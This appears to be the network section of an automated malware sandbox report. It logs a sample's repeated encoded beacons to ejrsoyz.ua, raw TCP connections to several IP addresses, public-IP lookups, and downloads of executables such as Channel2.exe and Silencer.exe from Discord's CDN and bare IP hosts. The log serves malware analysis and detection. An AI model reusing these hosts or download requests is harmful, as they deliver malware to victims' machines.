Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: unknown TCP traffic detected without corresponding DNS query: 45.91.200.135
Source: unknown TCP traffic detected without corresponding DNS query: 45.91.200.135
Source: unknown TCP traffic detected without corresponding DNS query: 45.91.200.135
Source: unknown TCP traffic detected without corresponding DNS query: 45.91.200.135
Source: unknown TCP traffic detected without corresponding DNS query: 45.91.200.135
Source: unknown TCP traffic detected without corresponding DNS query: 45.91.200.135
Source: unknown TCP traffic detected without corresponding DNS query: 45.91.200.135
Source: unknown TCP traffic detected without corresponding DNS query: 45.91.200.135
Source: unknown TCP traffic detected without corresponding DNS query: 45.91.200.135
Source: unknown TCP traffic detected without corresponding DNS query: 45.91.200.135
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 194.58.114.223
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.95
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 194.58.114.223
Source: unknown TCP traffic detected without corresponding DNS query: 194.58.114.223
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.95
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.95
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 194.58.114.223
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0050CB10 InternetOpenA,InternetOpenUrlA,InternetOpenUrlA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 3_2_0050CB10
Source: global traffic HTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /attachments/1274634716451967060/1289665540448583732/setup.exe?ex=66f9a621&is=66f854a1&hm=fc4266f43c6f8dfc860fb6b6d8abbcf74b2c0c3aad95f3315ea5328c3afac3cf& HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=wpi6oPUcntYrXWT3PYGwGgDWKmpGfD4ZkuNO6kBvh64-1727564002-1.0.1.1-MrMb8JOnPSN8tnxNgmDckRkxoeMJPdy.Zdp6geseOA1kyYiRgyy32DpdsDfaphc.ai880_T0oqzy1Ij9IOvFEQ; _cfuvid=Fux3.V5pZy3_FTP4N1VuUhIkq8HQnc5B3SRi7LPp5jE-1727564002783-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /1S3fd7 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplog.co
Source: global traffic HTTP traffic detected: GET /api/wp-ping.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.91.200.135
Source: global traffic HTTP traffic detected: GET /dl?name=mixnine HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 80.66.75.114Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /Files/Channel2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /Files/Silencer.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /Files/CheckTool.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /thebig/stories.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.113.115.95Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dergrherg/setup1.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: marafon.inCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d/385121 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 194.58.114.223Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /Files/tac.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /name HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /add?substr=mixnine&s=three&sub=NOSUB HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c444db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf814c6eb959d3e HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
